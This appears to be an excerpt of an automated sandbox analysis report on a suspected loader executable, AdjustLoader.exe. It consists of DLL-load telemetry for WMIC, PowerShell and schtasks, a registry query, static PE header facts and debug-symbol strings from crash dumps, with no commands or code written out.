Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pdh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exe Section loaded: pdh.dll
Source: C:\Windows\System32\lsass.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\dwm.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Users\user\Desktop\AdjustLoader.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: AdjustLoader.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: AdjustLoader.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: AdjustLoader.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: AdjustLoader.exe Static file information: File size 25672704 > 1048576
Source: AdjustLoader.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0xc3da00
Source: AdjustLoader.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Configuration.Install.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Data.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Xml.pdbp source: WER8844.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbH source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: C:\Users\admin\source\repos\Uni2\Uni2\obj\x64\Release\Uni2.pdb source: AdjustLoader.exe
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.DirectoryServices.pdb source: WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Core.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Numerics.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Management.pdb source: WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.DirectoryServices.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Configuration.Install.pdb4 source: WER4655.tmp.dmp.45.dr
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: mscorlib.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Configuration.Install.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Xml.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdbP source: WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.CSharp.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.DirectoryServices.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Configuration.Install.pdb` source: WER8844.tmp.dmp.11.dr
Source: Binary string: System.Configuration.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.DirectoryServices.pdbh source: WER4655.tmp.dmp.45.dr
Source: Binary string: System.Configuration.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Data.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Data.ni.pdbRSDSC source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.Security.pdbjS source: WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Xml.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Management.Automation.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.CSharp.pdb%N source: WER4655.tmp.dmp.45.dr
Source: Binary string: System.Data.pdbH source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
